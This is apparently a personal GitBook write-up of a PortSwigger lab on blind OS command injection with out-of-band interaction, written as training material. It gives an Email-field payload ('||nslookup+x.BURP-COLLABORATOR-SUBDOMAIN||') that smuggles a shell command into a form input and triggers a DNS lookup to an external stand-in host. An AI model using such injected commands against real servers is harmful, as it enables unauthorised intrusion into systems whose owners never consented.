Daemon Of Hacking
  • WELCOME!
    • 👋/home/usr/KruKnight
  • METHODOLOGIES & RESOURCES
    • Passwords & Attacks
    • Post Exploitation
      • 👀Situational Awareness
      • 🖥️Privilege Escalation
        • Linux Privilege Escalation
        • Windows Privilege Escalation
  • Writeups
    • CyCtf 2024
      • Vending Machine
      • Aerospace
      • OhMyCell
    • Portswigger Labs
      • Authentication
        • Username enumeration via different responses
        • 2FA simple bypass
        • Password reset broken logic
        • Username enumeration via subtly different responses
        • Username enumeration via response timing
        • Broken Brute-Force Protection, IP Block
        • Username enumeration via account lock
        • 2FA broken logic
        • Brute-forcing a stay-logged-in cookie
        • Offline password cracking
        • Password reset poisoning via middleware
        • Password brute-force via password change
        • Broken brute-force protection, multiple credentials per request
      • Os Command Injection
        • OS command injection, simple case
        • Blind OS command injection with time delays
        • Blind OS command injection with output redirection
        • Blind OS command injection with out-of-band interaction
        • Blind OS command injection with out-of-band data exfiltration
      • Cross-Origin Resource Sharing (CORS)
        • CORS vulnerability with basic origin reflection
        • CORS vulnerability with trusted null origin
        • CORS vulnerability with trusted insecure protocols
      • Server-side template injection
        • Basic server-side template injection
        • Basic server-side template injection (code context)
      • Server-Side Request Forgery (SSRF)
        • Basic SSRF against the local server
        • Basic SSRF against another back-end
        • Blind SSRF with out-of-band detection
        • SSRF with blacklist-based input filter
        • SSRF with filter bypass via open redirection vulnerability
      • Path Traversal
  • 🟩HTB Writeups
    • Heal
Powered by GitBook
On this page
  • Lab Description
  • Walkthrough
  • Step 1: Understanding the Feedback Functionality
  • Step 2: Intercepting the Feedback Request
  • Step 3: Crafting and Injecting the Payload
  • Step 4: Verifying Out-of-Band Interaction
  • Why Use Out-of-Band Interaction?

Was this helpful?

  1. Writeups
  2. Portswigger Labs
  3. Os Command Injection

Blind OS command injection with out-of-band interaction

PreviousBlind OS command injection with output redirectionNextBlind OS command injection with out-of-band data exfiltration

Last updated 5 months ago

Was this helpful?

Lab Description

Walkthrough

Step 1: Understanding the Feedback Functionality

The Submit Feedback page contains four input fields:

  • Name

  • Email

  • Subject

  • Message

Our goal is to test whether these fields are vulnerable to command injection by leveraging out-of-band (OOB) interactions via DNS lookups to Burp Collaborator.

Step 2: Intercepting the Feedback Request

Using Burp Suite, intercept the HTTP request when submitting feedback. The intercepted request will contain parameters corresponding to the form inputs.

Objective: Modify one of these parameters to execute a payload that triggers a DNS lookup to Burp Collaborator.

Step 3: Crafting and Injecting the Payload

In the Email field, inject the following payload:

||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||

This payload triggers a DNS lookup for the subdomain generated by Burp Collaborator, confirming that the server executes commands.

Payload Breakdown:

  • ||: Ends the existing shell command.

  • nslookup: A command to perform DNS lookups.

  • x.BURP-COLLABORATOR-SUBDOMAIN: Replaces x with the generated subdomain for monitoring.

Submit the request with the modified payload.

  • The server responds with 200 OK, indicating the payload was executed.

Step 4: Verifying Out-of-Band Interaction

Switch to the Burp Collaborator tab and click Poll now.

  • Observe DNS requests generated by the server to your subdomain.

Why Use Out-of-Band Interaction?

When the server does not return command output or write it to an accessible location, OOB interaction is the best way to verify that a command was executed. DNS lookups leave a trace on external systems, enabling confirmation of blind vulnerabilities without requiring direct output.